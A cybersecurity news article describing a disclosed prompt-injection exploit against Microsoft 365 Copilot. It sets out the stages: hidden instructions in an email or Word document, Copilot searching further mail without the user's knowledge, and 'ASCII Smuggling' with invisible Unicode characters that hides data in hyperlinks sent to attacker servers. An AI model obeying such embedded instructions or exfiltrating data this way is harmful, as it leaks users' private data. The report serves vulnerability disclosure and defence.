New Attack on Microsoft 365 Copilot Steals Personal Data
A cybersecurity researcher has uncovered a critical vulnerability in the AI-powered assistant Copilot, integrated into Microsoft 365, which enables malicious actors to exfiltrate sensitive data.
The exploit, previously submitted to the Microsoft Security Response Center (MSRC), combines several sophisticated techniques, posing significant risks to data security and privacy. The vulnerability was discovered during research published by the Embrace The Red team.
The exploit is a multi-stage attack. It begins with the recipient receiving a malicious email or document containing concealed instructions. When these instructions are processed by Copilot, the tool automatically activates, searching for additional emails and documents, thereby escalating the attack without user intervention.
The key element of this exploit is the so-called ASCII Smuggling technique. This method employs specific Unicode characters to render data invisible to the user. Attackers can embed sensitive information into hyperlinks, which, when clicked, transmit data to servers under their control.
The research demonstrated a scenario where a Word document containing specially crafted instructions successfully deceived Microsoft Copilot, compelling it to execute actions characteristic of fraudulent activity. This document utilized a “Prompt Injection” technique, allowing commands to be embedded within the text, which Copilot interpreted as legitimate requests.
As Copilot processed this document, it began executing the embedded actions as if they were standard user commands. Consequently, the tool automatically initiated actions that could result in the leakage of sensitive information or other forms of fraud, without any warning to the user.
The final stage of the attack is data exfiltration. By controlling Copilot and accessing additional data, attackers embed hidden information within hyperlinks, which are then transmitted to external servers when clicked by users.
To mitigate the risk, the researcher recommended several measures to Microsoft, including disabling the interpretation of Unicode tags and preventing the display of hyperlinks. Although Microsoft has implemented some fixes, the details of these measures remain undisclosed, raising concerns.
The company’s response to the identified vulnerability has been partially successful: some exploits are no longer functional. However, the lack of detailed information about the applied fixes leaves questions about the complete security of the tool.
This case underscores the complexity of securing AI-driven tools and the need for continued collaboration and transparency to protect against future threats.
Related Posts:
- CVE-2024-38206: SSRF Vulnerability in Microsoft Copilot Studio Exposes Internal Infrastructure
- AI-Driven Phishing-as-a-Service: GXC Team Raises the Stakes in Cybercrime
- Critical vulnerability in Home Assistant OS and Home Assistant Supervised
- Microsoft will focus on building AI and cloud platforms in the future instead of Windows